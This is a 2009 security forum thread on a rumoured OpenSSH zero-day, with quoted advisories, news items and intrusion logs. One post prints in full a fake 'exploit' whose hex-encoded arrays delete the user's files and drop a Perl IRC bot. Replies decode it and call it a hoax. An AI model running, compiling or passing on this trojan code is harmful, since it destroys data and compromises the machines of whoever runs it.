openssh 0day rumors

Viewing 25 reply threads
  • Author
    Posts
    • #3974
      Jhaddix
      Participant

      http://www.securityaegis.com/?p=445

      I did a little recon on the rumors at the ISC:

      Rumors are flying of an underground openssh exploit. After some digging we find the tool name and its group:

      “./0pen0wn” by the hacker group called “anti-sec.”

      Two attack logs exist on the net with this supposed exploit, both by this group. The first is an attack on an Astalavista Admin:

      http://romeo.copyandpaste.info/txt/nowayout.txt

      The second attack is the one the Internet Storm Center blogged on which can be seen in its entirety here:

      http://tinyurl.com/l8tzba

      and a Russian site has a play by play of the attack here:

      http://tinyurl.com/m7cqdh

      A Belgian Blog has this to say about it:

          There have been a splash of openssh attacks and scanning – even in Belgium – and nobody seems to know what and why. There are some rumors and there is some discussion over at the Internet Storm Center but it is not all clear yet. The rumor is that a Zero day has been discovered for OLDER versions of Open SSH. This means there is no patch – but you can upgrade which will solve the issue.

          I know it is a lot of work but it is work that you have to do otherwise there will be much more other work that you will have to do when you become the stupid victim of an announced attack.

          Do the right think. Upgrade to the latest versions

          ps what is strange about the openSSH scans is that they are scanning a whole set of ports, not only the traditional ones. Maybe to find the diverting tactics (by chosing another port not to be found while scanning). Means they are smart these guys.

          Rumor tells us that Black Hat US may be the place where more information would be launched about this attack. That promises. It looks like this blackhat conference will become a hell of a show…

    • #25376
      Jhaddix
      Participant

      Update:

      ISC has a thrid update saying this:

          We’ve received a few emails that lend credibility to the rumor, and we’ve received a few more that paint an interesting picture – that the reports are all part of a cover-up to hide another breach that was caused by a sysadmin’s mistake.  What we are lacking is the actual exploit code.  So if this is “for real” would somebody slip us a copy and leave it under the door mat?  (Actually, our contactform is the best place.)  We won’t tell anybody where it came from but it sure would put a lid on this story.

      If you look at the attack log the ./0pen0wn script drops them into a jailshell which they have to escape to get get at box. This might have some insight on the exploit? They use ./MichaelScofield script (pun because hes a character in the tv series prison break) to get  /bin/sh and go after passwords, etc.

      sh-3.1$ ./MichaelScofield

      [+] MichaelScofield – Prison Breaker / anti-sec group
      [+] Grabbing environment variables…

      SHELL=/usr/local/cpanel/bin/jailshell

      [+] Injecting new shell..

      [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

      SHELL=/bin/sh

    • #25377
      timmedin
      Participant

      All you probably know by now, but it was a hoax.

    • #25378
      Jhaddix
      Participant

      Well the director of the ISC said that the vuln had merit, then Bojan an ISC handler and pentester said the below quotes.

      I don’t wanna spread FUD but  I’d suggest following these steps given by ISC readers:

      -make sure SSH is updated

      -lock down SSH on the hardware firewall level to come only from authorized IP addresses

      -hosts.deny or iptables active response.

      -use a port-knocking system especially on the SSH service

      -Portsentry listens on port 22, while openSSH-server has another port. ban port 22 connections via portsentry and iptables

      it may just be a new type of bruteforce, it may be something else, best be prepared anyways =)

      For the last couple of days we’ve been all witnesses of FUD surrounding a supposed 0-day exploit for OpenSSH skyrocketing.

      At this moment, it definitely looks like we’re dealing with a hoax – even more, it’s not the first time someone said they have a 0-day exploit for SSH. So, let’s see some facts about this.

      It appears that the whole story started after a post to the Full-Disclosure mailing list on the 4th of July (http://seclists.org/fulldisclosure/2009/Jul/0028.html). The post supposedly shows a hacker group using a 0-day exploit for SSH to compromise a server. After doing some research here, it appears that this is a long standing argument between two guys (or groups). One of our readers submitted the following URL address (http://flx.me/astahack2.txt), which shows another hack.

      The “exploit” used in that file is a brute force attack for sure, as can be seen below:

      anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt

      See the “-l” option? That supplies the list of users it will try to brute force.
      Additionally, a bit below it even prints which user was hacked:

            [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]

            user: crownvip
            uname: Linux srv01.webhostline.com
      2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux

      Now, what has been posted on the Full-Disclosure list (the supposed
      exploit) looked like this:

      anti-sec:~/pwn/xpl# ./0pen0wn -h xx.yy.143.133 -p 22

      Same group, same server, same directory – different file name. Why didn’t they use the mighty 0-day first time? They brute forced into the server and then had to jail break.
      This looks very much like a hoax to me – and this is the only evidence we have about a 0-day? A post from an anonymous e-mail address (hushmail) to the Full-Disclosure mailing list (which, we all have to admit, isn’t the best source of verified information)? And this was even enough for some web hosting companies to *shut down* their SSH service? I find this unbelievable.

      Finally, OpenSSH developers would probably agree with me – one of the developers sent an e-mail to the Openssh-unix-dev mailing list (http://lwn.net/Articles/340483/) also stating the obvious.

      So, I’d like to ask everyone not to spread the FUD anymore. Every piece of evidence we received so far points only to brute force attacks on SSH servers (which have been around for years!). Do keep an eye on your server and install all patches. We will post more information if we receive it, but until then I think there was enough of this FUD.


      Bojan

      No one has been verified wrong or right yet.

      Bojan gave an interview here:

      Security researchers have warned that a reported flaw in OpenSSH (Secure Shell) is a probable hoax.

      Earlier this week, SANS received an anonymous email claiming of a zero-day vulnerability in OpenSSH, which means a flaw in the software is already being exploited as it becomes public. OpenSSH (Secure Shell), is used by administrators to make encrypted connections with other computers and do tasks such as remotely updating files. OpenSSH is the open-source version, and there are commercial versions of the program.

      A true zero-day vulnerability in OpenSSH could be devastating for the Internet, allowing hackers to have carte blanche access to servers and PCs until a workaround or a patch is readied.

      “That’s why I think people are actually creating quite a bit of a panic,” said Bojan Zdrnja, a SANS analyst and senior information security consultant at Infigo, a security and penetration testing company in Zagreb, Croatia. “People should not panic right now. Nothing at this time points that there is an exploit being used in the wild.”

      The evidence of a true zero-day vulnerability in OpenSSH is weak, Zdrnja said. So far, analysts haven’t seen a working exploit, despite worries that a group called Anti-Sec may have found a zero-day that allowed them to control a web server. Details on the hack were posted on Full Disclosure, which is an unmoderated forum for security information.

      When pressed for more details, a person claiming to be part of Anti-Sec wrote an e-mail to the IDG news service saying “I’m not allowed to actually discuss the exploit (or whether or not it exists),” which was signed “Anonymous.”

      Zdrnja said the same group compromised another server recently, but it appeared to be a brute-force attack against OpenSSH. A brute-force attack is where a hacker tries many combinations of authentication credentials in order to get access to a server. If an administrator is using is using simple log-ins and passwords, it makes a server more vulnerable to a brute-force attack, Zdrnja said.

      Both of the compromised servers were run by the same person. “I suppose what we are dealing with here are two hackers in a war between themselves,” Zdrnja said.

      But there are other factors that indicate a zero-day for OpenSSH doesn’t exist. If the zero-day existed, hackers would probably be more likely to use it against a more high-profile server than the most recent one that was compromised, Zdrnja said.

      One of OpenSSH’s developers, Damien Miller, also threw cold water on the possibility of a zero-day. Miller wrote on an OpenSSH forum that he had exchanged mails with an alleged victim of the zero-day, but the attacks appeared to be “simple brute-force.”

      “So, I’m not persuaded that a zero-day exists at all,” Miller wrote. “The only evidence so far are some anonymous rumors and unverifiable intrusion transcripts.”

      There also seems to be some confusion between the alleged zero-day and a different vulnerability in OpenSSH, Zdrnja said. That vulnerability, which is as of yet unpatched, could allow an attacker to recover up to 32 bits of plain text from an arbitrary block of ciphertext from a connection secured using the SSH protocol in the standard configuration, according to an advisory from the UK’s Center for the Protection of National Infrastructure (CPNI).

      The severity of the vulnerability is considered high, but the chance of successful exploitation is low, according to CPNI. Zdrnja said administrators can implement stronger authentication mechanisms in OpenSSH using public and private keys to guard against a successful attack. In an advisory, OpenSSH also stated that the possibility of a successful attack was low.

    • #25379
      Vedder
      Participant

      @timmedin wrote:

      All you probably know by now, but it was a hoax.

      They have hit Imageshack over the weekend, looks like its another ssh exploit.

      I thought it was a hoax at first as well, now I am not so sure.

    • #25380
      Ketchup
      Participant

      I saw that it was Anti-Sec that hit Imageshack, but I couldn’t find how they did it.  Where did you see that it was an SSH exploit?  Can you please post a link?

    • #25381
      alan
      Participant

      only thing i saw was http://romeo.copyandpaste.info/txt/imageshack-pwned.txt

      nothing to suggest ssh?

    • #25382
      Ketchup
      Participant

      Thanks.  I saw the same elsewhere too.  There really isn’t much in terms of detail there, but it does reference OpenSSH, so who knows. 

    • #25383
      Jhaddix
      Participant

      captured during the netwars SANS CTF

      /* 0pen0wn.c by anti-sec group
      *
      * OpenSSH <= 5.2 REMOTE (r00t) EXPLOIT.
      *
      *
      * Takes advantage of an off-by-one
      * bug in mapped authentication space on system
      */
      #include
      #include
      #include
      #include
      #include
      #include
      #include
      #include
      #include
      #include

      #define VALID_RANGE 0xb44ffe00
      #define build_frem(x,y,a,b,c) a##c##a##x##y##b

      char jmpcode[] =
          "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
          "x64x65x76x2fx6ex75x6cx6cx20x26";

      char shellcode[] =
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
              "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a";


      char fbsd_shellcode[] =
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
              "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
              "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
              "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
              "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
              "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
              "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
              "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
              "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
              "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
              "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
              "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
              "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
              "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
              "x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
              "x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
              "x2fx74x6dx70x2fx68x69x0a";
      #define SIZE 0xffffff     
      #define OFFSET 131
      #define fremote build_frem(t,e,s,m,y)

      void usage(char *arg){
              printf("n[+] 0pen0wn 0wnz Linux/FreeBSDn");
              printf("  Usage: %s -h -p portn",arg);
              printf("  Options:n");
              printf("  t-h ip/host of targetn");
              printf("  t-p portn");
              printf("  t-d usernamen");
              printf("  t-B memory_limit 8/16/64nnn");
      }

      #define FD 0x080518fc
      #define BD 0x08082000

      int main(int argc, char **argv){
          FILE *jmpinst;
          char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
          int port=23, limit=8, target=0, sock;
          struct hostent *host;
          struct sockaddr_in addr;

          if (geteuid()) {
          puts("need root for raw socket, etc...");
          return 1;
          }

          if(argc < 3){
              usage(argv[0]);
              return 1;
          }

       
          printf("n  [+] 0wn0wn - by anti-sec groupn");
         
            if (!inet_aton(h, &addr.sin_addr)){
              host = gethostbyname(h);
              if (!host){
                  printf("  [-] Resolving failedn");
                  return 1;
              }
              addr.sin_addr = *(struct in_addr*)host->h_addr;
          }
         
          sock = socket(PF_INET, SOCK_STREAM, 0);
          addr.sin_port = htons(port);
          addr.sin_family = AF_INET;
          if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
              printf("  [-] Connecting failedn");
              return 1;
          }
          payload = malloc(limit * 10000);
          ptr = payload+8;
          memcpy(ptr,jmpcode,strlen(jmpcode));
          jmpinst=fopen(shellcode+793,"w+");
          if(jmpinst){
              fseek(jmpinst,0,SEEK_SET);
              fprintf(jmpinst,"%s",shellcode);
              fclose(jmpinst);
          }
          ptr += strlen(jmpcode);
          if(target != 5 && target != 6){
              memcpy(ptr,shellcode,strlen(shellcode));
              ptr += strlen(shellcode);
              memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
          }
          else{
              memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
              ptr += strlen(fbsd_shellcode);
              memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
          }
          send(sock,buffer,strlen(buffer),0);
          send(sock,ptr,3750,0);
          close(sock);
          if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == -1) {
              printf("  [-] connecting failedn");             
          }

          payload[sizeof(payload)-1] = '';
          payload[sizeof(payload)-2] = '';
          send(sock,buffer,strlen(buffer),0);
          send(sock,payload,strlen(payload),0);
          close(sock);
          free(payload);
          addr.sin_port = htons(6666);
          if(connect(sock, (struct sockaddr*)&addr, sizeof(addr))  == 0) {
                        /* v--- our cool bar that says: "r0000000t!!!" */
              printf("n  [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]nn");
              fremote("PS1='sh-3.2#' /bin/sh");
          }
          else
              printf("  [-] failed to exploit target :-(n");
          close(sock);
          return 0;
      }
    • #25384
      lincoln
      Participant

      Have you tried that code? I wouldn’t recommend it, only test on a virtual box you wouldn’t mind losing

    • #25385
      Ketchup
      Participant

      LOL, I second that.  The jmpcode[] converts to:

      rm -rf ~ /* 2> /dev/null &

    • #25386
      timmedin
      Participant

      @Ketchup wrote:

      LOL, I second that.   The jmpcode[] converts to:

      rm -rf ~ /* 2> /dev/null &

      …if we then jump into null and retrieve all files as we ride a unicorn over to the rainbow…

    • #25387
      UNIX
      Participant

      I have only looked through the posted source code quickly but it doesn’t seems to be an “openssh 0day exploit”.

    • #25388
      Vedder
      Participant

      @Ketchup wrote:

      LOL, I second that.  The jmpcode[] converts to:

      rm -rf ~ /* 2> /dev/null &

      Noobish question here – how do you convert that?

      /off to read up on shellcoding…

      *edit*

      Hex -> ASCII!

      Google works wonders 😉

    • #25389
      Vedder
      Participant

      I have just been converting the shellcode and all it seems to do is try and connect to an IRC channel.

      Am I missing something about the exploits “usefulness”?

      I will compile and test this on a virtual box at home later, it’ll be interesting, more as my first steps into understanding shellcode/exploits more than anything!

    • #25390
      Ketchup
      Participant

      Vedder, this does not appear to be an SSH exploit.  This looks more like the anti-sec group screwing around and trying to get people to erase their hard drives.  All this is likely to do is run the rm command on all of you files.    While I think that you are totally on the right track with testing exploits, I would just pick a legitimate one from milw0rm to play with.

    • #25391
      Vedder
      Participant

      Thanks Ketchup, that’s a very good idea, I’ll do that instead.

    • #25392
      Jhaddix
      Participant

      Sorry! i meant to post here but forgot… This code connects you to IRC Channel ‘Fag” and frags your hard drive =(

    • #25393
      UNIX
      Participant

      anti-sec is again in the news..it seems they have hacked http://blackhat-forums.com/ too and about two hours later a message was postet at seclists.org.
      It seems astalavista was attacked too.

      They also supplied information on a website of them.

    • #25394
      Ketchup
      Participant

      I was looking at that.  It’s difficult to judge how much capabilities they have, considering they are very much anti-disclosure.  They claim to have a few 0days in their arsenal, but I can’t tell how legitimate those claims are.  I am guessing though, that this forum would likely be one of their targets based on their mission.

    • #25395
      timmedin
      Participant

      I heard rumors that the 0day was “found” by a sys admin trying to cover his butt after an incident due to a misconfiguration. I’ve heard it from a few different places, but they are just rumors.

    • #25396
      UNIX
      Participant
    • #25397
      Ketchup
      Participant

      awesec, you always seem to get to these faster than I  ;D  I’ve trying to follow this as well.

      I really doubt that any sort of exploit, if it exists, is going to be released to the public.  Anti-sec movement is specifically against disclosing 0days.  I don’t see why they would break ranks on this one. 

      The message posted on the ssanz.net site right now is a bit strange.  It almost seems like the site admin is in on it. 


      SSANZ - Hacked

      Unfortunately SSANZ has been hacked by anti-sec group.

      Data has been erased & Backups erased.

      SSANZ Staff sincerely apologizes for this breach of security.

      What do you think?

    • #25398
      UNIX
      Participant

      As written in the second link given:

      – Why SSANZ?

      Owned by a kid who claims he can manage, secure and audit servers,
      he offers a service that he clearly cannot provide, we are against that.

      It is a little “weird” that first sites such as imageshack, blackhat forums and astalavista were hacked and now such a – compared to the others – small site. Also on the first mentioned sites there was “just a hack” but on ssanz it says

      […] Data has been erased & Backups erased. […]

      which doesn’t fit either.

      As anti-sec group is currently discussed on many news sites.. more links which may interest someone:

      http://www.webhostingtalk.com/showthread.php?t=854441
      http://ptc-investgations.blogspot.com/2009/07/mega-cash-zone-megacashzonecom-scam.html
      http://forums.digitalpoint.com/showthread.php?t=871938
      http://www.gpforums.co.nz/showthread.php?s=&postid=6198073

      Also note statements with different goals:

      This is primarily to prove that we are serious and committed to our primary goal – eradicating full-disclosure of computer vulnerabilities and exploits, and terminating general discussion of hacking for any n00b and script-kiddie to read and review – and learn from.

      We are coming for you hackforums.net…and Milw0rm.com. We haven’t forgotten you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which will cause a major blow to those who support full-disclosure of hacking related information.

      >>

      In 48 hours, the anti-sec movement will publicly unveil working exploit code and full details for the zero-day OpenSSH vulnerability we discovered. It will be posted to the Full-Disclosure security list.

      http://www.theregister.co.uk/2009/07/20/anti_sec_spoof/

    • #25399
      Vedder
      Participant

      It looks like ssanz has just used the recent anti-sec attacks to run with the money he’s made via visit4cash.

      I don’t understand anti-sec attacking imageshack – that was probably more of a PR stunt (by anti-sec) than anything.

      Blackhat-forums and astalavista attacks are keeping in line with their goals though.

      We arn’t going to see the 0day any time soon.

    • #25400
      UNIX
      Participant

      By now N3tD3v, a known group from England, has joined Anti Sec and stated that they were responsible for the hack on Matasano Security. They also announced that they will target milw0rm next.

Viewing 25 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?